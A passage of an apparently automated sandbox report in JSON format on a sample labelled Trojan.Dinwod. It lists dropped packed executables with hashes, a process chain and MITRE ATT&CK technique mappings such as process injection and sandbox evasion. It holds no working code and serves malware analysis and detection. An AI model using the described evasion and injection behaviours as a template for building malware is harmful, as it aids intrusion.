"no specific threat", "file_available_to_download": true}, {"name": "dljfl.exe", "file_path": "C:\\dljfl.exe", "file_size": 341794, "sha256": "53f1aa2e411ec8b567f57cee29be1d8f83a9f9ccc1b044326e1b266a59ae3cba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dljfl.exe (PID: 4092)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fhrbxhx.exe", "file_path": "C:\\fhrbxhx.exe", "file_size": 341834, "sha256": "57d06290fdacb624cccd7e47d9a906afc06d39fd2b8b98a3d29819f8635c9b50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhrbxhx.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fpfntvj.exe", "file_path": "C:\\fpfntvj.exe", "file_size": 341908, "sha256": "cd9625e99c03b5214e59f0d3191aeb0ee47d4f5edfd89d3db010b31ad30a50f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxvbljj.exe (PID: 3600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frphr.exe", "file_path": "C:\\frphr.exe", "file_size": 342408, "sha256": "5bdb3b13b856cac20cc4a1d070270a8d50da1c225af451b1e22cc6a9a3e8ad66", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rlvbpdv.exe (PID: 3604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxlhpd.exe", "file_path": "C:\\fxlhpd.exe", "file_size": 342129, "sha256": "fef27c7cf630aeb9a391da821ffa914f70e0f93b0093658097bcb77e24b2d534", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxlhpd.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnvfx.exe", "file_path": "C:\\hnvfx.exe", "file_size": 341727, "sha256": "0455fb4d4ada441308210060f11725228a9a0ff47fcca356a953dc93bd44aca3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnvfx.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hxtbvp.exe", "file_path": "C:\\hxtbvp.exe", "file_size": 341922, "sha256": "4820b401d51c411710812b2117ac3dfa2bb37a7975a32ad74c7c562b55ef6a23", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxtbvp.exe (PID: 3344)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxxfdjd.exe", "file_path": "C:\\jxxfdjd.exe", "file_size": 341936, "sha256": "26432cdfdb62ad7264418ceb7bf65d3ca6b2ed2e8f062638538c401aae5386d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxtbvp.exe (PID: 3344)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lnvvbl.exe", "file_path": "C:\\lnvvbl.exe", "file_size": 341851, "sha256": "a8ccf579902b28cce0ae91949ec8217ee7ba02d012b9c6d737a9c27ef7412058", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fhrbxhx.exe (PID: 4372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lrxfh.exe", "file_path": "C:\\lrxfh.exe", "file_size": 341804, "sha256": "895543ef47664291935652968f29e6468934a7159001ac1a84b269ee3abed9df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dljfl.exe (PID: 4092)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvjhvdf.exe", "file_path": "C:\\lvjhvdf.exe", "file_size": 342495, "sha256": "7583c8c05e2640843cfbca8733cde050ee205e7ba0f97979b1152e17fde18eeb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "284804.exe (PID: 2200)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nbhbvdb.exe", "file_path": "C:\\nbhbvdb.exe", "file_size": 341780, "sha256": "2090459fe327a25ef970c4f0e210c727a2d1b317d3f90653a6a5ca98b81baa17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vtttbl.exe (PID: 3944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndtrth.exe", "file_path": "C:\\ndtrth.exe", "file_size": 341741, "sha256": "8f5e2da0f86e3ca279b0a5dc4e945769f721cecee33ece7a92d7c87aaa7e7dba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnvfx.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nndjbrh.exe", "file_path": "C:\\nndjbrh.exe", "file_size": 342418, "sha256": "b736cd8cf870cbabd1bb05f8498585b4ec0f09aab22eb3e349de233d08bec73a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "frphr.exe (PID: 3076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nnvhlr.exe", "file_path": "C:\\nnvhlr.exe", "file_size": 342284, "sha256": "9eac4bd54d95099e9dae30c36e5e5bf356b78f64761a37d4f92ac5aed2d05ea3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nnvhlr.exe (PID: 416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pvvxhx.exe", "file_path": "C:\\pvvxhx.exe", "file_size": 341753, "sha256": "797240a2cef9d493af694de510fbfca6696b9fa9f6e6cfe35b432a2807ff9551", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ndtrth.exe (PID: 2812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rlvbpdv.exe", "file_path": "C:\\rlvbpdv.exe", "file_size": 342391, "sha256": "d98464665782438f3ec001a2158dde25e31496c56027a4ca4894c2860e870322", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rlvbpdv.exe (PID: 3604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxvbljj.exe", "file_path": "C:\\rxvbljj.exe", "file_size": 341889, "sha256": "861a1baf7305cc04ee81d0450cdf9ee1e00615d81443f23f3736cc85f000598b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxvbljj.exe (PID: 3600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tdxhf.exe", "file_path": "C:\\tdxhf.exe", "file_size": 342377, "sha256": "6db7e96353b9955e5addff8109306176b0a54e86c3157208b30898a895cd612d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tvlvjll.exe (PID: 788)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tnhhvv.exe", "file_path": "C:\\tnhhvv.exe", "file_size": 341816, "sha256": "7598bd3999cd6780bf2f584614ce0061fd7b183293d98fdbb85f1bca6f6fe7b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tnhhvv.exe (PID: 3628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tvlvjll.exe", "file_path": "C:\\tvlvjll.exe", "file_size": 342367, "sha256": "bd6597415234ecef8d507025cefcae280f159e561550a965414ea4691dc60b99", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2686426.exe (PID: 2824)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vfxjdn.exe", "file_path": "C:\\vfxjdn.exe", "file_size": 342272, "sha256": "1afd1e2fe7f6817f29fe8c8c015766a0bcba64f895952f5c3b7eb7e450b6210a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "280844.exe (PID: 3140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vldbx.exe", "file_path": "C:\\vldbx.exe", "file_size": 342143, "sha256": "8cf15126ee1dbbb1bdf48d48250f9c57132e1192cf6fad555b496947b9ac20f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxlhpd.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vtttbl.exe", "file_path": "C:\\vtttbl.exe", "file_size": 341770, "sha256": "5fbc56cc1dea24b2112a59382d8c384603cb8a234278117e568c69d0c02b51e3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vtttbl.exe (PID: 3944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbnptrh.exe", "file_path": "C:\\xbnptrh.exe", "file_size": 341954, "sha256": "61039caec90b0667ead244d64e8117583e452ade1dc3eb5d6f255927ee824877", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxxfdjd.exe (PID: 3520)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjpjtlp.exe", "file_path": "C:\\xjpjtlp.exe", "file_size": 342298, "sha256": "2ddd6e27b7c7f7f788c208d56d805b688252aa0b0082eb6a35242ba18b519bc0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nnvhlr.exe (PID: 416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "466480.exe", "file_size": 342678, "sha256": "c3fa15ce8144fb2829b7f1749d5f9d435dd46603884202ca4f36e496d20d87c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nfxflv.exe", "file_size": 342667, "sha256": "0baeee662ea93af9b40ff4a061d24889babfa0eb8614473540f7f6d3ae810f32", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00680.exe", "file_size": 342654, "sha256": "632a6b27c92e5e8369a1f378d1aeb3705caee2dedd1018b44d532a10224bde4f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xxdfh.exe", "file_size": 342641, "sha256": "8183445502ce109fe96b379c11c657642a3b4fd91b33434967fb0f0f977c93e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "604488.exe", "file_size": 342629, "sha256": "64fe4d9ddbf660634d4cf772b2359619a03e32041dbf4b5e55b35acf06a96344", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvxvt.exe", "file_size": 342618, "sha256": "8d90b51c048e340e46fe99e3a7c54cafd9688e5fab155859864ffa63d8392318", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjrxrhl.exe", "file_size": 342606, "sha256": "10c0ddf502f74f7d5513c29a8f06523a9db5062b7fec86fd1f61327a9fd1df62", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hptvf.exe", "file_size": 342591, "sha256": "1bb47e8692df5ed51c0f53cc25a856e203120eb8692011acac6e493000ce4418", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbffrbx.exe", "file_size": 342579, "sha256": "25705f3e88f44381981633c0cdb7337a609d2d323b26c9a2ba8e19d31bd4258f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nffbnt.exe", "file_size": 342566, "sha256": "a153020faf625f23b79a25b029b5491c0487700e5908ae86a124a946bdb20875", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "88880.exe", "file_size": 342546, "sha256": "6227caf5c9b9cf7913f0e9b2d3de6b4644c89dac3b9dcf5ad749d0f25a328915", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60248.exe", "file_size": 342529, "sha256": "48bc3dcca58da191af5b9f3ea91a5eead6a12fd9b1d65990fde727f6b562ce8c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jtxbhtx.exe", "file_size": 342509, "sha256": "cec6c51f22a64a620cb5effa866df34b2cf02e68a2219bd98b7de97472f0f0cd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006052", "name": "934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe", "normalized_path": "C:\\934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe", "sha256": "934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00006016", "parentuid": "00000000-00006052", "name": "442800.exe", "normalized_path": "c:\\442800.exe", "sha256": "8becf5f1ea9e0d1c568e6676991b65676d46a327a78c879b958e5baa576dd15f"}, {"uid": "00000000-00005892", "parentuid": "00000000-00006016", "name": "282462.exe", "normalized_path": "c:\\282462.exe", "sha256": "bb46c226d390e9b7fc0bdaf308a88845f176740fb4561bbaf47cb1ae76a90231"}, {"uid": "00000000-00005764", "parentuid": "00000000-00005892", "name": "02006.exe", "normalized_path": "c:\\02006.exe", "sha256": "ce5c20b2343e323d45660934afddf64d2cdeaaff19c71356369d50ee04499bcf"}, {"uid": "00000000-00004108", "parentuid": "00000000-00005764", "name": "248486.exe", "normalized_path": "c:\\248486.exe", "sha256": "1b626ffecfe1c610fba63304711f0cf3b1223e4323c9702acd06dda6476e5a2a"}, {"uid": "00000000-00005876", "parentuid": "00000000-00004108", "name": "6002286.exe", "normalized_path": "c:\\6002286.exe", "sha256": "e693ffc67430d2ac7a56c8d3f779e1906d95b6bb877f5c8da1bb6e8201c8f78c"}, {"uid": "00000000-00004288", "parentuid": "00000000-00005876", "name": "4484802.exe", "normalized_path": "c:\\4484802.exe", "sha256": "2cf8fd155566cdf60e73c6c90c29e127181567784c4e4792e7134a9f870007ac"}, {"uid": "00000000-00006076", "parentuid": "00000000-00004288", "name": "60480.exe", "normalized_path": "c:\\60480.exe", "sha256": "637d773bf1c8581803daaae2bc2eed9603f70eedf6c8dcfdcd414b7fbfc8d360"}, {"uid": "00000000-00005900", "parentuid": "00000000-00006076", "name": "682088.exe", "normalized_path": "c:\\682088.exe", "sha256": "c82bc660e94671a3bd2fbcdfc09dbbd5c0f8a495da7356d6b6e10adff27ebda4"}, {"uid": "00000000-00004100", "parentuid": "00000000-00005900", "name": "828684.exe", "normalized_path": "c:\\828684.exe", "sha256": "973e88319d188c1c249d3b5d15bcfbfe63cb60b68d15ce72e2db295ba54ee0c0"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"466480.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nfxflv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"00680.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xxdfh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"604488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jvxvt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjrxrhl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hptvf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rbffrbx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nffbnt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"88880.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"60248.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jtxbhtx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lvjhvdf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"284804.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"466842.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0246246.exe\" has flags like 